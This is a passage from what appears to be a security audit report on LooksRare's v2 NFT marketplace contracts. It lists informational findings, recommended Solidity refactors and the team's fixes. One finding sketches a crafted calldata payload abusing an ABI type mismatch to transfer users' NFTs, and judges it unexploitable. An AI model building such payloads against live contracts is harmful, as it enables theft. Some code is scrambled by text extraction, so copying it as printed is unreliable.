lt(add(a,b), a) } } Note that solc also performs a similar check when addition is used in a block that is not unchecked // YUL function checked_add_t_uint256(x, y) -> sum { x := cleanup_t_uint256(x) y := cleanup_t_uint256(y) sum := add(x, y) if gt(x, sum) { panic_error_0xXX() } } LooksRare: Only comments have been added to emphasize that custom overflow checks for premiums are not implemented. See PR 366. Spearbit: Verified. +5.5.2 StrategyFloorFromChainlink's isMakerBidValid compare the time dependent floorPrice to a fixed discount Severity: Informational Context: • StrategyFloorFromChainlink.sol#L313 Description: When isMakerBidValid gets called depending on the market conditions at that specific time the comparisons between the floorPrice and the discount might cause this function to either return isValid as true or false. Recommendation: The above issue needs to be documented for the users/makers so that they would be aware that the validation performed by the isMakerBidValid is time-dependent. This is also true when one checks the health of a price feed (positivity and freshness of the answer) for both chainlink floor price and USD strategies. 37 LooksRare: Documented in PR 370. Spearbit: Verified. +5.5.3 StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters Severity: Informational Context: • StrategyFloorFromChainlink.sol#L79 • StrategyFloorFromChainlink.sol#L133 Description: For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategy- WithTakerBid, maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert: makerAsk.additionalParameters = abi.encode(premium); isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root. Recommendation: In isMakerAskValid check whether makerAsk.additionalParameters.length == 32 and if not set isValid to false and return with a custom error selector. LooksRare: Implemented recommendation in PR 365. Spearbit: Verified. +5.5.4 StrategyFloorFromChainlink strategies do not check for asset types explicitly Severity: Informational Context: • StrategyFloorFromChainlink.sol#L54 • StrategyFloorFromChainlink.sol#L108 • StrategyFloorFromChainlink.sol#L162 • StrategyFloorFromChainlink.sol#L219 • StrategyCollectionOffer.sol#L32 • StrategyCollectionOffer.sol#L73 Description: StrategyFloorFromChainlink has 4 different execution endpoints: • executeFixedPremiumStrategyWithTakerBid • executeBasisPointsPremiumStrategyWithTakerBid • executeFixedDiscountCollectionOfferStrategyWithTakerAsk • executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk All these endpoints require that only one amount to be passed (asked for or bid on) and that amount would need to be 1. This is in contrast to StrategyCollectionOffer strategy that allows an arbitrary amount (although also required to be only one amount, [a]) Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/ data-feeds/nft-floor-price/addresses So, if there are no price feeds for ERC1155 (as of now), the transaction would revert. Thus implicitly one can deduce that the chainlink floor strategies are only implemented for ERC721 tokens. Other strategies condition the amounts based on the assetType: 38 • assetType == 0 or ERC721 collections can only have 1 as a valid amount • assetType == 0 or ERC1155 collections can only have a non-zero number as a valid amount If in the future chainlink or another token-price-feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1. Recommendation: Either document/comment (in NatSpec) that StrategyFloorFromChainlink is meant to be used for ERC721 tokens and in this case perhaps in the strategy execution and validation endpoints one should revert if assetType is non-zero. Or to future-proof and unify the amount validation with other strategies, condition the allowed amounts based on the asset type like above (example or the suggested implementation in https://github.com/spearbit-audits/ review-looksrare/issues/12). LooksRare: Comments added in PR 355. Spearbit: Verified. +5.5.5 itemIds and amounts are redundant fields for takerXxx struct Severity: Informational Context: • OrderStructs.sol#L133-L134 • OrderStructs.sol#L116-L117 Description: Taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. Most implemented strategies (which are fixed/chosen by the maker through signing the makerXxx which includes the strategyId) require the itemIds and amounts fields for the maker and the taker to mirror each other. i : the j th element of maker's itemIds fields (the struct would be either MakerBid or MakerAsk depending • M j on the context) • M j a : the j th element of maker's amounts fields (the struct would be either MakerBid or MakerAsk depending on the context) • T j i : the j th element of taker's itemIds fields (the struct would be either TakerBid or TakerAsk depending on the context) • T j a : the j th element of taker's amounts fields (the struct would be either TakerBid or TakerAsk depending on the context) Borrowing notations also from: • "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies" • IneheritedStategy : T j i = M j • StrategyDutchAuction : T j i , T j i = M j a = M j a i , T j a = M j a , taker can send extra itemIds and amounts but they won't be • StrategyUSDDynamicAsk : T j i = M j i , T j a = M j a , taker can send extra itemIds and amounts but they won't be used. used. • StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : T 0 i = M 0 i , T 0 a = M 0 a = 1 , taker can send extra itemIds and amounts but they won't be used. • StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : T 0 a = M 0 a = 1 , maker's itemIds are unused. • StrategyCollectionOffer : T 0 a = M 0 a , maker's itemIds are unused and taker's T i a for i > 0 are also unused. • StrategyItemIdsRange : M 0 i (cid:20) T j i (cid:20) M 1 i , P T j a = M 0 a . 39 For • IneheritedStategy • StrategyDutchAuction • StrategyUSDDynamicAsk • StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid Shared taker's itemIds and amounts are redundant as they should exactly match maker's fields. For the other strategies, one can encode the required parameters in either maker's or taker's additionalParameters fields. Recommendation: Redefine TakerAsk and TakerBid as: struct TakerAsk { address recipient; uint256 minPrice; bytes additionalParameters; } struct TakerBid { address recipient; uint256 maxPrice; bytes additionalParameters; } For StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk and Strate- gyCollectionOffer.executeCollectionStrategyWithTakerAsk encode takerAsk.additionalParameters as: takerAsk.additionalParameters = abi.encode(offeredItemId); // makerBid.itemIds will be unused For takerAsk.additionalParameters as: StrategyCollectionOffer.executeCollectionStrategyWithTakerAskWithProof encode takerAsk.additionalParameters = abi.encode(offeredItemId, proof); // makerBid.itemIds will be unused For StrategyItemIdsRange encode takerAsk.additionalParameters as makerBid.additionalParameters as: takerAsk.additionalParameters = abi.encode(offeredItems); // if implementing issues/56 or takerAsk.additionalParameters = abi.encode(offeredItemIds, offeredAmounts); makerBid.additionalParameters = abi.encode(desiredAmount, minItemId, maxItemId); For this strategy, the maker can leave the itemIds and amounts fields empty. Implementing this recommendation would remove the necessity of all the checks to ensure the mirroring structures. LooksRare: Fix implemented in PR 353, PR 373 and PR 383. TakerBid and TakerAsk are merged into: struct Taker { address recipient; bytes additionalParameters; } Any extra parameter for a strategy is encoded in additionalParameters. Spearbit: Verified. 40 +5.5.6 discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWith- TakerAsk Severity: Informational Context: • StrategyFloorFromChainlink.sol#L242 • StrategyFloorFromChainlink.sol#L249 • StrategyFloorFromChainlink.sol#L244-L247 Description: executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not if discount == 99_99 which almost has the same effect. Note that if discount == 10_000, (forgetting about the revert) price = desiredPrice = 0. So, unless the taker (sender of the transaction) has set its takerAsk.minPrice to 0 (maker is bidding for a 100% discount and taker is gifting the NFT), the transaction would revert: if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0 revert AskTooHigh(); } Recommendation: Document why discount == 10_000 is not allowed. • Options 1 If decided to allow 100% discount on the floor price, then one can simplify the code so that instead of storing discount in makerBid.additionalParameters, we would store 10_000 - discount and call it desiredPriceRatioInBPS: uint256 desiredPriceRatioInBPS = abi.decode(makerBid.additionalParameters, (uint256)); if (priceRatioInBPS > 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * desiredPriceRatioInBPS) / 10_000; // <-- saves a subtraction • Options 2 If we do not want discount to get close to 10_000, perhaps as an alternative, we can introduce a stricter upper bound for it. Note Similiar discussion applies to floorPrice <= discountAmount in executeFixedDiscountCol- lectionOfferStrategyWithTakerAsk LooksRare: Allowing discount to be 100% in PR 368. We think it is best not to pursue option 1 even though it saves a subtraction. It's more readable/consistent to use the name discount for both fixed and basis points discount than to use discount for fixed discount and desired ratio for basis points discount. If we are to use desiredPriceRatioInBPS, we will have to do the same for the premium and validate the premium to be greater than 10,000. Spearbit: Verified. 41 +5.5.7 Restructure executeMultipleTakerBids's input parameters Severity: Informational Context: • LooksRareProtocol.sol#L166 • LooksRareProtocol.sol#L175-L180 Description: executeMultipleTakerBids has the following form function executeMultipleTakerBids( OrderStructs.TakerBid[] calldata takerBids, OrderStructs.MakerAsk[] calldata makerAsks, bytes[] calldata makerSignatures, OrderStructs.MerkleTree[] calldata merkleTrees, address affiliate, bool isAtomic ) For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkle- Trees all have the same length. We can enforce this requirement by definition, if we restructure the input passed to executeMultipleTakerBids. Recommendation: Define a new struct struct BidOrder { TakerBid takerBid; MakerAsk makerAsk; bytes makerSignature; MerkleTree merkleTree; } and pass an input parameters of this type to executeMultipleTakerBids function executeMultipleTakerBids( BidOrder[] calldata bidOrders, address affiliate, bool isAtomic ) external payable nonReentrant { uint256 length = bidOrders.length; if (length == 0) { revert WrongLengths(); // <--- possibly this can be changed to WrongLength() } ... Optionally, one can apply this parameter change to executeTakerAsk (we need to define a new struct for this instance) and executeTakerBid as well. Related issue: "Restructure transferBatchItemsAcrossCollections input parameter format". LooksRare: Acknowledged but won't adjust. Spearbit: Acknowledged. 42 +5.5.8 Restructure transferBatchItemsAcrossCollections input parameter format Severity: Informational Context: • TransferManager.sol#L112-L119 • TransferManager.sol#L122-L130 • TransferManager.sol#L140-L142 Description: transferBatchItemsAcrossCollections has the following form function transferBatchItemsAcrossCollections( address[] calldata collections, uint256[] calldata assetTypes, address from, address to, uint256[][] calldata itemIds, uint256[][] calldata amounts ) where collections, assetTypes, itemIds and amounts are supposed to have the same lengths. One can enforce that by redefining the input parameter and have this invariant enforced by definition. Recommendation: Define a new struct struct TransferItem { address collection; uint256 assetType; uint256[] itemIds; uint256[] amounts; } or if implementing: • "Restructure struct definitions in OrderStructs in a more optimized format". struct TransferItem { address collection; uint256 assetType; Item[] items; } and so transferBatchItemsAcrossCollections will have the following form: 43 function transferBatchItemsAcrossCollections( address from, address to, TransferItem[] calldata transferItems ) external { uint256 transferItemsLength = transferItems.length; if (transferItemsLength == 0) { revert WrongLengths(); // <--- possibly this can be changed to WrongLength() } if (from != msg.sender) { if (!isOperatorValidForTransfer(from, msg.sender)) { revert TransferCallerInvalid(); } } for (uint256 i; i < transferItemsLength; ) { uint256 itemsForSingleTransfer = transferItems[i].items.length; if (itemsForSingleTransfer == 0) { // <--- if issues/56 implemented revert WrongLengths(); // <--- possibly this can be changed to WrongLength() } ... An added benefit is that the calldata is more compactly packed as well. Optionally, One could redfine transferItemsERC721 and transferItemsERC1155 using the above new struct. Related issue: "Restructure executeMultipleTakerBids's input parameters". Warning The issue below needs to be re-examined due to the change of input parameters structures: • "An approved operator can call transferBatchItemsAcrossCollections". LooksRare: Fixed in PR 375. Only transferBatchItemsAcrossCollections has been modified to use the new struct. Spearbit: Verified. +5.5.9 An approved operator can call transferBatchItemsAcrossCollections Severity: Informational Context: • TransferManager.sol#L112 Description: TransferManager has 3 endpoints that an approved operator can call: • transferItemsERC721 • transferItemsERC1155 • transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: , address transferItemsERC1155 address ,! address[], address[], address, address , uint256[][], uint256[][] // ,! transferBatchItemsAcrossCollections , address, uint256[], uint256[] // transferItemsERC721, 44 An operator like LooksRareProtocol might have an owner ( OL ) that can select/add arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: the protocol would call abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[] ) that when decoded as (address[], address[], address, address, uint256[][], uint256[][]) It would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted paramters | original parameter ,! ; ---------------------------------- ,! -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr ,! 00000000000000000000000000000000000000000000000000000000000000X3 ; from ,! 00000000000000000000000000000000000000000000000000000000000000X4 ; to ,! itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr ,! amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr ,! itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItem- sERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which unless both have length 0 it would cause the compiled code to revert due to out of range index access. This is also dependent on if/how the compiler encodes/decodes the calldata and if the compiler would add the bytecodes for the deployed code to revert for OOR accesses (which solc does). This is just a lucky coincidence otherwise, OT could have exploited this flaw. Recommendation: 1. transferBatchItemsAcrossCollections has not been used by the LooksRareProtocol as an operator for any asset types and its presence is only utilitarian. It's recommended to be removed from TransferManager. If transferBatchItemsAcrossCollections is needed it can be defined in another transfer manager contract. 45 2. With the current implementation of _transferNFT which assumes all endpoints of a transfer manager con- sume the same combination of input parameters, in all defined transfer managers the endpoints that an operator can call should consume the same input parameter types. 3. To add even more protection, each transfer manager should only handle 1 asset type and only through 1 endpoint that an operator can call. Or users of transfer managers should be able to handpick which endpoints an operator is approved to call for that transfer manager (vs the current implementation where the user approval for an operator is at the contract level). This would introduce a more granular approval process for the operators. // below is just an example, another solution is to index the endpoints and // bitmap up to 256 selector permissions into one storage slot mapping(address => mapping(address => mapping(bytes4 => bool))) public ,! hasUserApprovedOperatorForASelector; LooksRare: Acknowledged. This function may be used in future versions of protocols that would sell bundles across multiple collections. With the change, it is not possible with v2 to add new asset types so it should be partially mitigated. Spearbit: Acknowledged. +5.5.10 Shared login in different StrategyFloorFromChainlink strategies can be refactored Severity: Informational Context: • StrategyFloorFromChainlink.sol#L54 • StrategyFloorFromChainlink.sol#L108 • StrategyFloorFromChainlink.sol#L162 • StrategyFloorFromChainlink.sol#L219 Description: • executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid. • executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCol- lectionOfferStrategyWithTakerAsk. Each group of endpoints in the above list share the exact same logic. The only difference they have is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. function a1() external view returns () { () = _a1(); // inlined computation of _a1 } function a2() external view returns () { () = _a2(); // inlined computation of _a2 } Recommendation: Using function pointers, we can refactor the common logic between endpoints in this context 46 function a1() external view returns () { return _a(, _a1); } function a2() external view returns () { return _a(, _a2); } function _a1() internal view returns () { // can also be `pure` depending ,! on the context ... } function _a2() internal view returns () { // can also be `pure` depending ,! on the context ... } function _a( , function () internal view returns () f ) external view returns () { () = f(); // <-- internal function pointer } The above design has the added benefit of if one would like to update either or , this would only require applying the change in one location versus two. With the current implemen- tation, if one forgets to apply the change to both locations of or the related strategies would deviate from each other. // SPDX-License-Identifier: MIT pragma solidity ^0.8.17; // Chainlink aggregator interface import {AggregatorV3Interface} from ,! "@chainlink/contracts/src/v0.8/interfaces/AggregatorV3Interface.sol"; // Libraries import {OrderStructs} from "../../libraries/OrderStructs.sol"; // Shared errors import {AskTooHigh, BidTooLow, OrderInvalid, WrongCurrency, WrongFunctionSelector} from ,! "../../interfaces/SharedErrors.sol"; // Base strategy contracts import {BaseStrategy} from "../BaseStrategy.sol"; import {BaseStrategyChainlinkMultiplePriceFeeds} from "./BaseStrategyChainlinkMultiplePriceFeeds.sol"; /** * @title StrategyFloorFromChainlink * @notice This contract allows a seller to make a floor price + premium ask * * @author LooksRare protocol team (,) */ and a buyer to make a floor price - discount collection bid. contract StrategyFloorFromChainlink is BaseStrategy, BaseStrategyChainlinkMultiplePriceFeeds { /** * @notice It is returned if the fixed discount for a maker bid is greater than floor price. */ 47 error DiscountGreaterThanFloorPrice(); /** * @notice Wrapped ether (WETH) address. */ address public immutable WETH; /** * @notice Constructor * @param _owner Owner address * @param _weth Address of WETH */ constructor(address _owner, address _weth) BaseStrategyChainlinkMultiplePriceFeeds(_owner) { WETH = _weth; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status * This strategy looks at the seller's desired execution price in ETH (floor + premium) and ,! minimum execution price and chooses the higher price. * @param takerBid Taker bid struct (contains the taker bid-specific parameters for the execution ,! of the transaction) * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired premium amount in ETH from the floor price ,! as the additionalParameters. */ function executeFixedPremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executePremiumStrategyWithTakerBid( takerBid, makerAsk, _fixedPremiumPriceCalculator ); } function _fixedPremiumPriceCalculator( uint256 floorPrice, uint256 premium ) internal pure returns (uint256 desiredPrice) { desiredPrice = floorPrice + premium; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the seller's desired execution price in ETH (floor * (1 + ,! premium)) and minimum execution price and chooses the higher price. 48 * @param takerBid Taker bid struct (contains the taker bid-specific parameters for the execution ,! of the transaction) * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired premium basis points from the floor price as ,! the additionalParameters. */ function executeBasisPointsPremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executePremiumStrategyWithTakerBid( takerBid, makerAsk, _basisPointsPremiumPriceCalculator ); } function _basisPointsPremiumPriceCalculator( uint256 floorPrice, uint256 premium ) internal pure returns (uint256 desiredPrice) { desiredPrice = (floorPrice * (10_000 + premium)) / 10_000; } function _executePremiumStrategyWithTakerBid( OrderStructs.TakerBid calldata takerBid, OrderStructs.MakerAsk calldata makerAsk, function ( uint256 /* floorPrice */ , uint256 /* premium */ ) internal pure returns (uint256 /* desiredPrice */ ) _desiredPriceCalculator ) internal view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } } if ( makerAsk.itemIds.length != 1 || makerAsk.amounts.length != 1 || makerAsk.amounts[0] != 1 || makerAsk.itemIds[0] != takerBid.itemIds[0] || takerBid.amounts[0] != 1 ) { 49 revert OrderInvalid(); } uint256 floorPrice = _getFloorPrice(makerAsk.collection); uint256 premium = abi.decode(makerAsk.additionalParameters, (uint256)); uint256 desiredPrice = _desiredPriceCalculator(floorPrice, premium); // <--- passed function ,! pointer if (desiredPrice >= makerAsk.minPrice) { price = desiredPrice; } else { price = makerAsk.minPrice; } if (takerBid.maxPrice < price) { revert BidTooLow(); } itemIds = makerAsk.itemIds; amounts = makerAsk.amounts; isNonceInvalidated = true; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the bidder's desired execution price in ETH (floor - discount) ,! and maximum execution price and chooses the lower price. * @param takerAsk Taker ask struct (contains the taker ask-specific parameters for the execution ,! of the transaction) * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired discount amount in ETH from the floor price ,! as the additionalParameters. */ function executeFixedDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executeDiscountCollectionOfferStrategyWithTakerAsk( takerAsk, makerBid, _calculateFixedDiscountedPrice ); } function _calculateFixedDiscountedPrice( uint256 floorPrice, uint256 discount ) internal pure returns (uint256 desiredPrice) { if (floorPrice <= discount) { 50 revert DiscountGreaterThanFloorPrice(); } desiredPrice = floorPrice - discount; } /** * @notice This function validates the order under the context of the chosen strategy and return ,! the fulfillable items/amounts/price/nonce invalidation status. * This strategy looks at the bidder's desired execution price in ETH (floor * (1 - ,! discount)) and maximum execution price and chooses the lower price. * @param takerAsk Taker ask struct (contains the taker ask-specific parameters for the execution ,! of the transaction) * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @return price The final execution price * @return itemIds The final item ids to be traded * @return amounts The corresponding amounts for each item id. It should always be 1 for any asset ,! type. * @return isNonceInvalidated Whether the order's nonce will be invalidated after executing the ,! order * @dev The client has to provide the bidder's desired discount basis points from the floor price ,! as the additionalParameters. */ function executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid ) external view returns (uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool ,! isNonceInvalidated) { return _executeDiscountCollectionOfferStrategyWithTakerAsk( takerAsk, makerBid, _calculateBasisPointsDiscountedPrice ); } function _calculateBasisPointsDiscountedPrice( uint256 floorPrice, uint256 discount ) internal pure returns (uint256 desiredPrice) { // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; } function _executeDiscountCollectionOfferStrategyWithTakerAsk( OrderStructs.TakerAsk calldata takerAsk, OrderStructs.MakerBid calldata makerBid, function ( uint256 /* floorPrice */ , uint256 /* discount */ ) internal pure returns (uint256 /* desiredPrice */ ) _desiredPriceCalculator ) internal view 51 returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { if (makerBid.currency != WETH) { revert WrongCurrency(); } if ( takerAsk.itemIds.length != 1 || takerAsk.amounts.length != 1 || takerAsk.amounts[0] != 1 || makerBid.amounts.length != 1 || makerBid.amounts[0] != 1 revert OrderInvalid(); ) { } uint256 floorPrice = _getFloorPrice(makerBid.collection); uint256 discount = abi.decode(makerBid.additionalParameters, (uint256)); uint256 desiredPrice = _desiredPriceCalculator(floorPrice, discount); // <--- passed function ,! pointer if (desiredPrice >= makerBid.maxPrice) { price = makerBid.maxPrice; } else { price = desiredPrice; } if (takerAsk.minPrice > price) { revert AskTooHigh(); } itemIds = takerAsk.itemIds; amounts = takerAsk.amounts; isNonceInvalidated = true; } /** * @notice This function validates *only the maker* order under the context of the chosen strategy. ,! It does not revert if * the maker order is invalid. Instead it returns false and the error's 4 bytes selector. * @param makerAsk Maker ask struct (contains the maker ask-specific parameters for the execution ,! of the transaction) * @param functionSelector Function selector for the strategy * @return isValid Whether the maker struct is valid * @return errorSelector If isValid is false, it returns the error's 4 bytes selector */ function isMakerAskValid( OrderStructs.MakerAsk calldata makerAsk, bytes4 functionSelector ) external view returns (bool isValid, bytes4 errorSelector) { if ( functionSelector != ,! StrategyFloorFromChainlink.executeBasisPointsPremiumStrategyWithTakerBid.selector && functionSelector != ,! StrategyFloorFromChainlink.executeFixedPremiumStrategyWithTakerBid.selector ) { return (isValid, WrongFunctionSelector.selector); 52 } if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { return (isValid, WrongCurrency.selector); } } if (makerAsk.itemIds.length != 1 || makerAsk.amounts.length != 1 || makerAsk.amounts[0] != 1) { return (isValid, OrderInvalid.selector); } (, bytes4 priceFeedErrorSelector) = _getFloorPriceNoRevert(makerAsk.collection); if (priceFeedErrorSelector == bytes4(0)) { isValid = true; } else { errorSelector = priceFeedErrorSelector; } } /** * @notice This function validates *only the maker* order under the context of the chosen strategy. ,! It does not revert if * the maker order is invalid. Instead it returns false and the error's 4 bytes selector. * @param makerBid Maker bid struct (contains the maker bid-specific parameters for the execution ,! of the transaction) * @param functionSelector Function selector for the strategy * @return isValid Whether the maker struct is valid * @return errorSelector If isValid is false, it returns the error's 4 bytes selector * @dev The client has to provide the bidder's desired discount amount in ETH from the floor price ,! as the additionalParameters. */ function isMakerBidValid( OrderStructs.MakerBid calldata makerBid, bytes4 functionSelector ) external view returns (bool isValid, bytes4 errorSelector) { if ( functionSelector != ,! StrategyFloorFromChainlink.executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk.selector && functionSelector != StrategyFloorFromChainlink.executeFixedDiscountCollectionOfferStrategyWithTakerAsk.selector ) { } return (isValid, WrongFunctionSelector.selector); if (makerBid.currency != WETH) { return (isValid, WrongCurrency.selector); } if (makerBid.amounts.length != 1 || makerBid.amounts[0] != 1) { return (isValid, OrderInvalid.selector); } (uint256 floorPrice, bytes4 priceFeedErrorSelector) = ,! _getFloorPriceNoRevert(makerBid.collection); uint256 discount = abi.decode(makerBid.additionalParameters, (uint256)); if ( functionSelector == 53 ,! StrategyFloorFromChainlink.executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk.selector ) { if (discount >= 10_000) { return (isValid, OrderInvalid.selector); } } if (priceFeedErrorSelector != bytes4(0)) { return (isValid, priceFeedErrorSelector); } if ( functionSelector == StrategyFloorFromChainlink.executeFixedDiscountCollectionOfferStrategyWithTakerAsk.selector ) { if (floorPrice <= discount) { // A special selector is returned to differentiate with OrderInvalid since the maker ,! can potentially become valid again return (isValid, DiscountGreaterThanFloorPrice.selector); } } isValid = true; } function _getFloorPrice(address collection) private view returns (uint256 price) { address priceFeed = priceFeeds[collection]; if (priceFeed == address(0)) { revert PriceFeedNotAvailable(); } (, int256 answer, , uint256 updatedAt, ) = AggregatorV3Interface(priceFeed).latestRoundData(); // Verify the answer is not null or negative if (answer <= 0) { revert InvalidChainlinkPrice(); } // Verify the latency if (block.timestamp > maxLatency + updatedAt) { revert PriceNotRecentEnough(); } price = uint256(answer); } function _getFloorPriceNoRevert( address collection ) private view returns (uint256 floorPrice, bytes4 errorSelector) { address priceFeed = priceFeeds[collection]; if (priceFeed == address(0)) { return (floorPrice, PriceFeedNotAvailable.selector); } (, int256 answer, , uint256 updatedAt, ) = AggregatorV3Interface(priceFeed).latestRoundData(); if (answer <= 0) { return (floorPrice, InvalidChainlinkPrice.selector); } if (block.timestamp > maxLatency + updatedAt) { return (floorPrice, PriceNotRecentEnough.selector); 54 } return (uint256(answer), bytes4(0)); } } LooksRare: Fixed in PR 345. Spearbit: Verified. +5.5.11 Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager Severity: Informational Context: • ExecutionManager.sol#L154-L170 • ExecutionManager.sol#L240-L256 Description: Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid. Recommendation: Refactor the shared logic. Define: function _setTheRestOfFeeAmountsAndRecipients( uint256 strategyId, uint256 price, address askRecipient, address[3] memory recipients, uint256[3] memory fees ) private view { // Compute minimum total fee amount uint256 minTotalFeeAmount = (price * strategyInfo[strategyId].minTotalFeeBp) / 10_000; if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; // Net fee amount for seller fees[2] = price - fees[0]; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, strategyId, fees[1], minTotalFeeAmount); // Net fee amount for seller fees[2] = price - fees[1] - fees[0]; } recipients[0] = protocolFeeRecipient; recipients[2] = askRecipient; } and replace ExecutionManager.sol#L154-L170 with: _setTheRestOfFeeAmountsAndRecipients( makerBid.strategyId, price, takerAsk.recipient == address(0) ? sender : takerAsk.recipient, recipients, fees ); and ExecutionManager.sol#L240-L256 with: 55 _setTheRestOfFeeAmountsAndRecipients( makerAsk.strategyId, price, makerAsk.signer, recipients, fees ); LooksRare: Implemented in PR 339. Spearbit: Verified. +5.5.12 Creator fee amount and recipient calculation can be refactored in ExecutionManager Severity: Informational Context: • ExecutionManager.sol#L141-L152 • ExecutionManager.sol#L227-L238 Description: The create fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeS- trategyForTakerBid are identical and can be refactored. Recommendation: Define function _calculateCreatorFeeAmountAndRecipient( address collection, uint256 price, uint256[] memory itemIds ) private view returns (address recipient, uint256 fee) { // Creator fee amount and adjustment of protocol fee amount if (address(creatorFeeManager) != address(0)) { (recipient, fee) = creatorFeeManager.viewCreatorFeeInfo(collection, price, itemIds); if (recipient == address(0)) { // If recipient is null address, creator fee is set at 0 fee = 0; } else if (fee * 10_000 > (price * uint256(maxCreatorFeeBp))) { // If creator fee is higher than tolerated, it reverts revert CreatorFeeBpTooHigh(); } } } and replace ExecutionManager.sol#L227-L238 with: (recipients[1], fees[1]) = _calculateCreatorFeeAmountAndRecipient( makerAsk.collection, price, itemIds ); and ExecutionManager.sol#L141-L152 with: (recipients[1], fees[1]) = _calculateCreatorFeeAmountAndRecipient( makerBid.collection, price, itemIds ); 56 LooksRare: Implemented in PR 